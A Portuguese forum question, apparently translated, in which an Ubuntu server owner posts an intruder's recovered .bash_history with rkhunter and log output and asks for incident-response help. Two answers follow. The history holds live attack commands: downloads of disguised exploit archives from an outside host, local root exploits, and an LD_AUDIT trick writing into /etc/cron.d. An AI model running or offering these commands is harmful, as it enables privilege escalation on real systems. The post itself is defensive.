Ubuntu Server hack

2

Eu olhei para o netstat e notei que alguém além de mim está conectado ao servidor pelo ssh. Eu cuidei disso porque meu usuário tem o único acesso ssh. Eu encontrei isso em um arquivo .bash_history do usuário ftp:

w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0  
dpkg -S /lib/libpcprofile.so 
ls -l /lib/libpcprofile.so 
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh 
vi a.sh 
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh .  ..  a.sh  .cache  ubuntu10.sh  ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd

O sistema está em uma prisão. Isso importa no caso atual? O que devo fazer?

Obrigado por todos !!

Eu fiz estes: - banir o host ssh conectado com o iptables - parou o sshd na cadeia - salvo: bach_history, syslog, dmesg, arquivos nas linhas do wget do bash_history

Eu instalei o rkhunter e o mostrei também. Eu corri o comando "unhide sys" e resultou em um processo oculto. Agora estou correndo rkhunter ... OK.

rkhunter -c resultou em alguns avisos:

  • na cadeia: Verificando se o acesso à raiz SSH é permitido [Warning] Verificando o arquivo de configuração do syslog [Warning]

    Executando verificações do sistema de arquivos Verificando arquivos e diretórios ocultos [Aviso]

  • sistema host: Realizando verificações do sistema de arquivos Verificando / dev para tipos de arquivos suspeitos [Warning] Verificando arquivos e diretórios ocultos [Aviso]

Eu encontrei no dmesg e syslog que o hacker tentou algo com irda:

  • syslog:
Feb 28 22:48:41 i386 kernel: [4180166.230061] irda_init()
Feb 28 22:48:41 i386 kernel: [4180166.230077] NET: Registered protocol family 23
Feb 28 22:48:46 i386 kernel: [4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: Called
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 22:49:33 i386 kernel: [4180218.465341] can: controller area network core (rev 20090105 abi 8)
Feb 28 22:49:33 i386 kernel: [4180218.465413] NET: Registered protocol family 29
Feb 28 22:49:33 i386 kernel: [4180218.493398] can: broadcast manager protocol (rev 20090105 t)
Feb 28 23:00:49 i386 kernel: [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 23:17:01 i386 CRON[10126]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: /home/i is already mounted
  • dmesg:
[4180166.230061] irda_init()
[4180166.230077] NET: Registered protocol family 23
[4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
[4180218.465341] can: controller area network core (rev 20090105 abi 8)
[4180218.465413] NET: Registered protocol family 29
[4180218.493398] can: broadcast manager protocol (rev 20090105 t)
[4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
    
por sysadmin1138 01.03.2011 / 00:09

2 respostas

3

Leve seu sistema para baixo, faça backup para análise forense futura, reconstrua do zero e restaure quaisquer dados necessários de um backup bom conhecido . Qualquer coisa menor do que isso deixa a possibilidade de uso de códigos maliciosos latentes.

    
por 01.03.2011 / 00:39
0

Você poderia tentar replicar o que o hacker fez e ver se ele poderia ter sucesso em algum momento (ele conseguiu copiar o arquivo "exploit" nos scripts cron?). Você provavelmente quer rodar o rkhunter para checar se o seu root está ou não, mas pode se esconder em outro lugar.

    
por 01.03.2011 / 00:16